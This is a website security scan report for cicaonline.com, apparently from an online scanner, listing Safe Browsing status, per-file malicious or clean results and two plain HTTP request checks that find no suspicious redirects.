Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cicaonline.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cicaonline.com/ | 200 OK Content-Length: 13894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://cicaonline.com/oodomimagerollover.js | 200 OK Content-Length: 8587 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
http://cicaonline.com/golf.pdf | 200 OK Content-Length: 302130 Content-Type: application/pdf | clean |
http://cicaonline.com/test404page.js | 404 Not Found Content-Length: 1706 Content-Type: text/html | clean |
http://cicaonline.com/meeting.pdf | 200 OK Content-Length: 52054 Content-Type: application/pdf | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cicaonline.com
Result:
HTTP/1.1 200 OK
Date: Sat, 10 Jan 2015 07:08:25 GMT
Accept-Ranges: bytes
ETag: "685c94f426c1ce1:0"
Server: Microsoft-IIS/7.0
Content-Length: 13894
Content-Type: text/html
Last-Modified: Fri, 04 Oct 2013 17:27:09 GMT
X-Powered-By: ASP.NET
...13894 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cicaonline.com
Referer: http://www.google.com/search?q=cicaonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.